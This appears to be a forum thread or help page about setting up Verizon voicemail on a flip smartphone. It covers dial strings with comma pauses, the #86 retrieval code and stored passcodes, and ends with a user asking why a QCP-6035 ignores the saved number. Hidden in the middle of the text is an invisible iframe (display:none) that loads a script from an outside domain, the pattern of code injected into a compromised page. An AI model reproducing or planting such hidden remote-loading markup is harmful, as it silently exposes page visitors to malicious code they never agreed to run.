To setup Verizon's voice mail on the Smartphone, you need to goto Messages, then click on the Messages tab at the top of the screen.
Now, click on the voice mail number box.
Here's the cool stuff: Most of Verizon's voice mail works by calling your cell#, pressing the '#" or '*,' and then keying in your passcode. So, when you are entering your voice mail number, do this: 1) put in your cell # with area code 2)then put in four commas(this is for the timed pause) 3)put in '#' or '*' depending upon your area 4)put in another comma 5)put in your passcode.
This will allow you to access voice mail by just pressing and holding the envelope button on the outside of the flip.
I have already assumed that you have setup your voice mail account through Verizon.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
Most wireless companies also have a seperate "voicemail retrieval #" that can be obtained through their customer care, this will allow you to call and usually get right into your voice mail without having to hit the # or * key.
There is also a setting in most voicemail's that allows you to set it so that it does not ask for a password.
Verizon has #86 (VM) for voice mail retrieval anywhere in the US. I have entered, as my Voice Mail number, #86%#,xxxx,11. This calls voice mail and waits for a hard pause (you must press the jog button to release)then presses the # waits enters your code xxxx and retrieves your first message 11.
I recently bought a QCP-6035 and tried to put in *86,,,#,xxxx as the voice mail phone number for message retrieval without using my password. But when I went to use it, only *86 appeared. I went so far as to change the number to *99, just to see what would happen. *86 appeared when calling voice mail. Is there a place besides messages/msg settings (which is reflected in two places I found on the pda side) that has this number stored? I have Verizon service, if that makes a difference.
